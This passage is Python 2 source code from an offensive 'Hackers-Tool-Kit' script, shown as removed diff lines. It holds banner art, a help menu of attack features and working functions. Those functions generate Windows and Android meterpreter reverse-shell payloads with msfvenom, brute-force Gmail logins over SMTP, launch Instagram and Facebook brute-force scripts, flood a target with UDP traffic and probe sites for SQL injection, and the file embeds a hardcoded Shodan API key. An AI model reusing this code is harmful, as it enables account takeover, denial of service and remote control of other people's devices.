██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner14(): - print """\033[34m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner15(): - print """\033[93m - __ _ - _wr"" "-q__ - _dP 9m_ - _#P 9#_ - d#@ \033[92mtype ? for help\033[93m 9#m - d## ### - J### ###L - {###K J###K - ]####K ___aaa___ J####F - __gmM######_ w#P"" ""9#m _d#####Mmw__ - _g##############mZ_ __g##############m_ - _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ - a###"" ,Z"#####@" '######"\g ""M##m - J#@" 0L "*## ##@" J# *#K - #" `# "_gmwgm_~ dF `#_ -7F "#_ ]#####F _dK JE -] *m__ ##### __g@" F - \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m - ` 0######_ ' - _0########_ - . _d#####^#####m__ , - "*w_________am#####P" ~9#####mw_________w*" - ""9@#####@M"" ""P@#####@M"" -\033[92m - ██░ ██ ▄▄▄█████▓ ██ ▄█▀ - ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ - ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ - ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ - ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ - ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ - ▒ ░▒░ ░ ░ ░ ░▒ ▒░ - ░ ░░ ░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░\033[0m - """.decode('utf-8') -def mainbanner16(): - print """\033[91m - :PB@Bk: - ,jB@@B@B@B@BBL. - 7G@B@B@BMMMMMB@B@B@Nr - :kB@B@@@MMOMOMOMOMMMM@B@B@B1, - :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. - 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr - G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S - @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ - B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B - @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ - @@OLB. BNB@MMOMOMM@BEB rBjM@B - @@ @ M OBOMOMM@q M .@ @@ - @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B - @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ - B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B - @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ - B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M - J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv - iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: - . B@M@B@MMM@B@B@B@MMM@@@M@B - @B@B.i@MBB@B@B@@BM@::B@B@ - B@@@ .B@B.:@B@ :B@B @B@O - :0 r@B@ B@@ .@B@: P: - vMB :@B@ :BO7 - ,B@B\033[0m - - \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m - ███████████████████████████ - type █?█ for help - ███ - \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ - ██ ██ \033[0m███\033[31m ██ ██▀ - ██ ██ \033[0m███\033[31m ██▄██ - ████████ \033[0m███\033[31m █████ - ██ ██ \033[0m███\033[31m ██ ██▄ - ██ ██ \033[0m███\033[31m ██ ██▄ - ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m - """.decode('utf-8') -def mainbanner17(): - print """ - - .---. - |---| - type |-\033[32m?\033[0m-| for help - |---| - .---^ - ^---. - :___________: - \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m - ███ ███ | |//| ███ ▄███▀ - ███ ███ | |//| ███▐██▀ - ███▄▄▄▄███ | |//| █████▀ - ███▀▀▀▀███ | |//| █████▄ - ███ ███ | |//| ███▐██▄ - ███ ███ | |.-| ███ ▀███▄ - \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m - \***/ - \*\033[91m/\033[31m - V\033[0m - """.decode('utf-8') -def mainbanner18(): - print """ - Type \033[31m?\033[0m For\033[31m Help\033[0m -\033[31m╔═══╗ ╔═══╗ ╔═════════════════════╗ ╔═══╗ ╔═══╗ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m║ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔═╝\033[0mHTK\033[31m╔╝ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ╚════════╗\033[0mHTK\033[31m╔════════╝ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m╔═╝ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║╔╝\033[0mHTK\033[31m╔╝ -║\033[0mHTK\033[31m╚═══════════╝\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m╚╝\033[0mHTK\033[31m╔╝ -║\033[0mHTKHHHHHHHHHHHHHHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK HTK\033[31m╔╝ -║\033[0mHTKTTTTTTTTTTTTTHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTK \033[31m╚╗\033[0m -║\033[31mHTKKKKKKKKKKKKKKHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m╔╗\033[31mHTK\033[0m╚═╗ -║\033[31mHTK\033[0m╔═══════════╗\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║╚═╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m║ -╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ - """.decode('utf-8') -def mainbanner19(): - print """\033[31m - # # - # # - %# \033[0m@tuf_unkn0wn\033[31m ## - ,%/ /%, - %## ##% - &%## ##%& - ,%%#####/. ,/#####%%, - %&%%#####/ \033[0m████\033[31m /#####%%&% - .&&%%%&& \033[0m████\033[31m &&%%%&&. - /&%( \033[0m████\033[31m (%&( - \033[0m████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - \033[31m██████\033[31m type \033[0m█\033[31m??\033[0m█ \033[31mfor help ██████ -██ \033[0m██████████████████████████████\033[31m ██ -███████ \033[0m██████████████████████████████\033[31m ███████ -██ ██ \033[0m████ \033[31m ██ ██ - ██████ \033[0m████ \033[31m ██████ - ▒ ▓▒ ▒ ▒ ▓▒ ▒ - ░ ▒ ░ ██████ ░ ▒ ░ - ░ ░ ██ ░ ░ - ███████ - ██ ██ - ██████ - ▒ ▓▒ ▒ - ░ ▒ ░ - ░ ░\033[0m - """.decode('utf-8') -def mainbanner20(): - print """ - - - ██╗\033[31m██╗ ██╗\033[0m██╗ ██╗\033[92m████████╗\033[0m██╗ ██╗\033[34m██╗ ██╗\033[0m██╗ - ██╔╝\033[31m██║ \033[31m██║\033[0m╚██╗ ██╔╝\033[92m╚══\033[92m██╔══╝\033[0m╚██╗ ██╔╝\033[34m██║ ██╔╝\033[0m╚██╗ -██╔╝ \033[31m███████║ \033[0m╚██╗██╔╝\033[92m ██║ \033[0m╚██╗██╔╝\033[34m █████╔╝ \033[0m╚██╗ -╚██╗ \033[31m██╔══██║ \033[0m██╔╝╚██╗ \033[92m██║ \033[0m ██╔╝╚██╗\033[34m ██╔═██╗\033[0m ██╔╝ - ╚██╗\033[31m██║ ██║\033[0m██╔╝ ╚██╗\033[92m ██║ \033[0m ██╔╝ ╚██╗\033[34m██║ ██╗\033[0m██╔╝ - ╚═╝\033[31m╚═╝ ╚═╝\033[0m╚═╝ ╚═╝\033[92m ╚═╝ \033[0m ╚═╝ ╚═╝\033[34m╚═╝ ╚═╝\033[0m╚═╝ - Created by @tuf_unkn0wn type ? for help - - """.decode('utf-8') - - - -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,20) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() - if num == 8: - mainbanner8() - if num == 9: - mainbanner9() - if num == 10: - mainbanner10() - if num == 11: - mainbanner11() - if num == 12: - mainbanner12() - if num == 13: - mainbanner13() - if num == 14: - mainbanner14() - if num == 15: - mainbanner15() - if num == 16: - mainbanner16() - if num == 17: - mainbanner17() - if num == 18: - mainbanner18() - if num == 19: - mainbanner19() - if num == 20: - mainbanner20() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -update : update the hackers-tool-kit -clear : clears screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -phpload : make a php reverse_tcp payload and start it in a multi handler -pyload : make a python reverse_tcp payload and start it in a multi handler -foxhis : gather firefox history from privileged javascript shell -rhawk : run the RED_HAWK script (info gathering tool) -nano : open nano text editor -compilec: compile a c file -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - 